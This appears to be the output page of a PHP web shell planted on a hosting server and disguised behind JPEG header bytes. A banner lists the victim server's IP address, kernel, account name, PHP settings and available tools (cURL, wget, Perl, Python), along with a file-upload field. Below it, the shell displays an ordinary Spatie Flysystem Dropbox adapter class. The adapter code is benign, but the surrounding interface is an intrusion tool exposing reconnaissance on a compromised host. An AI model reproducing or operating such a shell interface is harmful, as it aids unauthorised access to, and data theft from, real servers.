����JFIF��x�x����'
| Server IP : 78.140.185.180  /  Your IP : 216.73.216.38 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/././././././public_html/vendor/spatie/flysystem-dropbox/src/  | 
Upload File :  | 
<?php
namespace Spatie\FlysystemDropbox;
use League\Flysystem\Adapter\AbstractAdapter;
use League\Flysystem\Adapter\Polyfill\NotSupportingVisibilityTrait;
use League\Flysystem\Config;
use League\Flysystem\Util\MimeType;
use Spatie\Dropbox\Client;
use Spatie\Dropbox\Exceptions\BadRequest;
class DropboxAdapter extends AbstractAdapter
{
    use NotSupportingVisibilityTrait;
    /** @var \Spatie\Dropbox\Client */
    protected $client;
    public function __construct(Client $client, string $prefix = '')
    {
        $this->client = $client;
        $this->setPathPrefix($prefix);
    }
    /**
     * {@inheritdoc}
     */
    public function write($path, $contents, Config $config)
    {
        return $this->upload($path, $contents, 'add');
    }
    /**
     * {@inheritdoc}
     */
    public function writeStream($path, $resource, Config $config)
    {
        return $this->upload($path, $resource, 'add');
    }
    /**
     * {@inheritdoc}
     */
    public function update($path, $contents, Config $config)
    {
        return $this->upload($path, $contents, 'overwrite');
    }
    /**
     * {@inheritdoc}
     */
    public function updateStream($path, $resource, Config $config)
    {
        return $this->upload($path, $resource, 'overwrite');
    }
    /**
     * {@inheritdoc}
     */
    public function rename($path, $newPath): bool
    {
        $path = $this->applyPathPrefix($path);
        $newPath = $this->applyPathPrefix($newPath);
        try {
            $this->client->move($path, $newPath);
        } catch (BadRequest $e) {
            return false;
        }
        return true;
    }
    /**
     * {@inheritdoc}
     */
    public function copy($path, $newpath): bool
    {
        $path = $this->applyPathPrefix($path);
        $newpath = $this->applyPathPrefix($newpath);
        try {
            $this->client->copy($path, $newpath);
        } catch (BadRequest $e) {
            return false;
        }
        return true;
    }
    /**
     * {@inheritdoc}
     */
    public function delete($path): bool
    {
        $location = $this->applyPathPrefix($path);
        try {
            $this->client->delete($location);
        } catch (BadRequest $e) {
            return false;
        }
        return true;
    }
    /**
     * {@inheritdoc}
     */
    public function deleteDir($dirname): bool
    {
        return $this->delete($dirname);
    }
    /**
     * {@inheritdoc}
     */
    public function createDir($dirname, Config $config)
    {
        $path = $this->applyPathPrefix($dirname);
        try {
            $object = $this->client->createFolder($path);
        } catch (BadRequest $e) {
            return false;
        }
        return $this->normalizeResponse($object);
    }
    /**
     * {@inheritdoc}
     */
    public function has($path)
    {
        return $this->getMetadata($path);
    }
    /**
     * {@inheritdoc}
     */
    public function read($path)
    {
        if (! $object = $this->readStream($path)) {
            return false;
        }
        $object['contents'] = stream_get_contents($object['stream']);
        fclose($object['stream']);
        unset($object['stream']);
        return $object;
    }
    /**
     * {@inheritdoc}
     */
    public function readStream($path)
    {
        $path = $this->applyPathPrefix($path);
        try {
            $stream = $this->client->download($path);
        } catch (BadRequest $e) {
            return false;
        }
        return compact('stream');
    }
    /**
     * {@inheritdoc}
     */
    public function listContents($directory = '', $recursive = false): array
    {
        $location = $this->applyPathPrefix($directory);
        try {
            $result = $this->client->listFolder($location, $recursive);
        } catch (BadRequest $e) {
            return [];
        }
        $entries = $result['entries'];
        while ($result['has_more']) {
            $result = $this->client->listFolderContinue($result['cursor']);
            $entries = array_merge($entries, $result['entries']);
        }
        if (! count($entries)) {
            return [];
        }
        return array_map(function ($entry) {
            $path = $this->removePathPrefix($entry['path_display']);
            return $this->normalizeResponse($entry, $path);
        }, $entries);
    }
    /**
     * {@inheritdoc}
     */
    public function getMetadata($path)
    {
        $path = $this->applyPathPrefix($path);
        try {
            $object = $this->client->getMetadata($path);
        } catch (BadRequest $e) {
            return false;
        }
        return $this->normalizeResponse($object);
    }
    /**
     * {@inheritdoc}
     */
    public function getSize($path)
    {
        return $this->getMetadata($path);
    }
    /**
     * {@inheritdoc}
     */
    public function getMimetype($path)
    {
        return ['mimetype' => MimeType::detectByFilename($path)];
    }
    /**
     * {@inheritdoc}
     */
    public function getTimestamp($path)
    {
        return $this->getMetadata($path);
    }
    public function getTemporaryLink(string $path): string
    {
        return $this->client->getTemporaryLink($path);
    }
    public function getTemporaryUrl(string $path): string
    {
        return $this->getTemporaryLink($path);
    }
    public function getUrl(string $path): string
    {
        return $this->getTemporaryLink($path);
    }
    public function getThumbnail(string $path, string $format = 'jpeg', string $size = 'w64h64')
    {
        return $this->client->getThumbnail($path, $format, $size);
    }
    public function createSharedLinkWithSettings($path, $settings)
    {
        return $this->client->createSharedLinkWithSettings($path, $settings);
    }
    /**
     * {@inheritdoc}
     */
    public function applyPathPrefix($path): string
    {
        $path = parent::applyPathPrefix($path);
        return '/'.trim($path, '/');
    }
    public function getClient(): Client
    {
        return $this->client;
    }
    /**
     * @param string $path
     * @param resource|string $contents
     * @param string $mode
     *
     * @return array|false file metadata
     */
    protected function upload(string $path, $contents, string $mode)
    {
        $path = $this->applyPathPrefix($path);
        try {
            $object = $this->client->upload($path, $contents, $mode);
        } catch (BadRequest $e) {
            return false;
        }
        return $this->normalizeResponse($object);
    }
    protected function normalizeResponse(array $response): array
    {
        $normalizedPath = ltrim($this->removePathPrefix($response['path_display']), '/');
        $normalizedResponse = ['path' => $normalizedPath];
        if (isset($response['server_modified'])) {
            $normalizedResponse['timestamp'] = strtotime($response['server_modified']);
        }
        if (isset($response['size'])) {
            $normalizedResponse['size'] = $response['size'];
            $normalizedResponse['bytes'] = $response['size'];
        }
        $type = ($response['.tag'] === 'folder' ? 'dir' : 'file');
        $normalizedResponse['type'] = $type;
        return $normalizedResponse;
    }
}